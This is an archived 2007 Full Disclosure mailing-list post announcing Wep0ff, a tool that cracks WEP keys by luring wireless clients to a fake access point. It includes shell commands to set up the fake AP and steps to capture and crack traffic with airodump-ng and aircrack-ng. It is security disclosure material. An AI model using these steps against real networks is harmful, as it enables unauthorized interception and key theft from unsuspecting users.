Full Disclosure mailing list archives
New tool for "evil twins" wireless attacks
From: "noreply" <noreply () ptsecurity ru>
Date: Wed, 17 Jan 2007 13:11:54 +0300
Wep0ff is a new tool to crack a WEP key without access to the AP by mounting a fake access point attack against WEP-based wireless clients.
http://www.ptsecurity.ru/download/wepoff.tar.gz
It uses a combination of fragmentation and evil twin attacks to generate traffic which can be used for KoreK-style WEP-key recovery.
From readme:
This tool can be used to mount a fake access point attack against WEP-based wireless clients. Using Atheros wireless cards in Linux.

For details check http://www.securitylab.ru/analytics/287596.php (Russian)

Written by Sergey Gordeychik <gordey (at) ptsecurity (dot) com>
Released under a BSD Licence

This code was tested with patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for the fake AP) and a second in monitor mode (to listen on).

How to Use:

1. Set up a fake AP with KARMA tools or iwconfig

    iwpriv ath0 mode 2
    iwconfig ath0 mode master essid foo enc 1122334455 channel 7
    echo 1 > /proc/sys/dev/ath0/rawdev
    echo 1 > /proc/sys/dev/ath0/rawdev_type
    ifconfig ath0 up
    ifconfig ath0raw up

2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until a client connects to the fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover the WEP key

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/